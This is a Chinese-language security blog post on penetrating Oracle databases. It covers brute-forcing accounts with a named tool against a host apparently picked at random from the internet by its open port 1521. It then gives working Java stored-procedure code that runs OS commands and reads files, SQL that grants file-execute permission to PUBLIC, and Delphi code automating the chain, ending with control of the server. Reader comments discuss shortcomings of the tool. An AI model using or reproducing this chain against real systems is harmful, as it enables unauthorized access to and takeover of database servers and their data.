Oracle数据库渗透技术浅析

  
                      
文/图赵显阳(isafe.cc" target="_blank">isafe.cc" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc)
oracle数据库简介
oracle是一个数据库系统,和 MS SQL Server 数据库类似,支持SQL语言的同时还支持ada编程、Java代码编程等,可以运行在Windows,Linux等操作系统上,今天来对如何渗透Oracle数据库系统进行研究,Oracle的漏洞有很多,如默认DBSNMP账号密码,低版本的SID枚举,本地权限提升,一些函数存在SQL注入,缓冲区溢出等等。下面我们先来破解Oracle的登录账号,然后使用Delphi编程在数据库服务器上执行任意命令。
oracle数据库账号破解
破解无非是暴力破解,即不断的尝试密码,直到成功登入系统为止,破解前需要一个字典,字典很关键,决定破解的结果,我们用到一个款工具”【河马】Oracle数据库审计工具”,这是河马安全网出品的针对Oracle审计的工具,主界面如图1

                                             图1
我们在网上随便找个oracle系统吧,怎么找,看端口1521是否开放,是的话就说明服务器是oracle的,我们以202.107.*.* 为例来测试下,如图2,(破解密码)

                            图2
oracle数据库执行任意命令
我们使用delphi的odac组件来编程实现命令执行,命令执行是建立Java函数,来执行OS命令的,先看看版本1的代码,这个代码有缺陷,就是在SQL窗口中没有返回内容(在odac中也是一样的),但是在sqlplus中是有返回内容的,看代码
    
        
            
            创建 java 源 www_isafe_cc_Util
            create or replace and compile
                java source named "www_isafe_cc_Util"
                as
                import java.io.*;
               import java.lang.*;
                public class www_isafe_cc_Util extends Object
                {
                public static int RunThis(String args)
                {
                Runtime rt = Runtime.getRuntime();
                int    rc = -1;
                try
                {
                Process p = rt.exec(args);
                int bufSize = 4096;
                BufferedInputStream bis =
                 new BufferedInputStream(p.getInputStream(), bufSize);
                 int len;
                 byte buffer[] = new byte[bufSize];
                 // Echo back what the program spit out
                while ((len = bis.read(buffer, 0, bufSize)) != -1)
                   System.out.write(buffer, 0, len);
                  rc = p.waitFor();
                }
                 catch (Exception e)
                 {
                  e.printStackTrace();
                  rc = -1;
                 }
                finally
                {
                  return rc;
                 }
                 }
                }
               /
            
             Java created.
            
             建立函数 www_isafe_cc_RUN_CMD
             create or replace
             function www_isafe_cc_RUN_CMD(p_cmd in varchar2) return number
                as
               language java
                name 'www_isafe_cc_Util.RunThis(java.lang.String) return integer';
             /
             Function created.
             建立一过程调用函数
               create or replace procedure RC(p_cmd in varchar2)
               as
                x number;
               begin
                x := www_isafe_cc_run_cmd(p_cmd);
               end;
            
        
    
在sqlplus中调用
variable x number;                
set serveroutput on                
exec dbms_java.set_output(100000);
grant javasyspriv to system;
grant javauserpriv to system;
exec :x := www_isafe_cc_RUN_CMD('ipconfig');
如图2,图3


                                            图2

                            图3
但是在SQL窗口中不能执行,SQL窗口和sqlplus中的命令窗口是有区别的,因为delphi中的odac组件是SQL窗口方式执行的,在网上找了很多资料,没有解决,后来改了java代码实现了使用odac组件的执行命令内容返回,该部分代码称为版本2,如下代码
创建java 源 www_isafe_cc_Util
    
        
            
            create or replace and compile java source named "www_isafe_cc_Util" as import java.io.*; public class www_isafe_cc_Util extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
            new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
            }
            
        
    
创建调用函数www_isafe_cc_RunCMD
    
        
            
            create or replace function www_isafe_cc_RunCMD(p_cmd in varchar2) return varchar2 as language java name 'www_isafe_cc_Util.runCMD(java.lang.String) return String';
            
        
    
赋予执行权限
    
        
            
            begin dbms_java.grant_permission( 'PUBLIC', 'SYS:java.io.FilePermission', '>', 'execute');end;
            
        
    
  
                                  
                                             图4
命令成功执行了,有结果返回,其它的功能如读文件,目录浏览代码差不多,就这样吧,我贴出delphi执行命令的关键代码:
    
        
            
            procedure TfrmMain.btnCreateFunClick(Sender: TObject);
            var
             ConnStr:string;
             StrSQL,StrSQL2:string;
            begin
             btnCreateFun.Enabled:=False;
             try
                try
                  ConnStr:=Format(
[url=mailto:'%s/%s@%s',[edtUser.Text,edtPass.Text,edtSid.Text,edtHost.Text]);
                  oraSession1.Options.Direct:=True;
                  oraSession1.Server:=edtHost.Text;
                  oraSession1.Username:=edtUser.Text;
                  oraSession1.Password:=edtPass.Text;
                  oraQuery1.Connection:=OraSession1;
                  if oraQuery1.Active then
                    oraquery1.Active:=False;
                  oraQuery1.SQL.Clear;
                  //oraquery1.SQL.Text:= 'select * from v$version';
                  oraQuery1.SQL.Text:= MemoPack.Lines.Text;
                  oraQuery1.Execute;
                  Memo1.Lines.Add('包已建立');
                  while not oraQuery1.Eof do
                  begin
                    Memo1.Lines.Add(OraQuery1.Fields[0].asString);
                    oraQuery1.Next;
                  end;
                  if oraQuery1.Active then
                    oraQuery1.Active:=False;
                  oraQuery1.SQL.Clear;
                  oraQuery1.SQL.Text:= MemoFunc.Lines.Text;
                  oraquery1.Execute;
                  Memo1.Lines.Add('函数已建立');
                  while Not oraQuery1.Eof do
                  begin
                    Memo1.Lines.Add(OraQuery1.Fields[0].asString);
                    oraQuery1.Next;
                  end;
                  if oraQuery1.Active then
                    oraQuery1.Active:=False;
                  oraQuery1.SQL.Clear;
                  oraQuery1.SQL.Text:= MemoProc.Lines.Text;
                  oraquery1.Execute;
                  Memo1.Lines.Add('过程已建立');
                  while not oraQuery1.Eof do
                  begin
                    Memo1.Lines.Add(OraQuery1.Fields[0].AsString);
                    oraquery1.Next;
                  end;
                  StrSQL2:='begin dbms_java.grant_permission( ''PUBLIC'', ''SYS:java.io.FilePermission'', ''>'', ''execute'');end;';
                  StrSQL:='begin dbms_java.grant_permission(''PUBLIC'', ''SYS:java.io.FilePermission'', ''>'', ''read'');end;';
            
                  if oraQuery1.Active then
                    oraQuery1.Active:=False;
                  oraQuery1.SQL.Clear;
                  oraQuery1.SQL.Add(StrSQL);
                  oraQuery1.ExecSQL;
                  Memo1.Lines.Add('赋予权限');
                  if oraQuery1.Active then
                    oraQuery1.Active:=False;
                  oraQuery1.SQL.Clear;
                  oraQuery1.SQL.Add(StrSQL2);
                  oraQuery1.ExecSQL;
                  Memo1.Lines.Add('赋予权限');
                  ListFolderJavaSource;
                  Memo1.Lines.Add('列目录');
                except
                   on e:Exception do
                   begin
                     ShowMessage(e.Message);
                   end;
                end;
             finally
             end;
             btnCreateFun.Enabled:=True;
            end;
            
        
    
总结
本文从Oracle数据库基本的密码破解入手,到执行服务器任意命令,一步一步来实现,最终控制了数据库所在服务器系统。
只允许会员下载 该文件只允许会员下载! 登录 | 注册

[本日志由 admin 于 2014-12-08 07:04 PM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
评论: 3 | 引用: 0 | 查看次数: 9306
  • 1
河马安全网 [2016-02-21 05:40 PM]
这个sid 和端口可以在oracle 客户端里配置。你需要安装oracle Enterprise Manager Console
河马安全网 [2015-01-29 10:52 AM]
你说的问题是存在的,由于最近手上事很多,要改进就推迟了。
pt007 [2015-01-26 12:09 AM]
这个程序有两处问题,第一没有oracle数据端口的输入框,第二没有SID连接符的输入框!
  • 1
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码
内 容:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭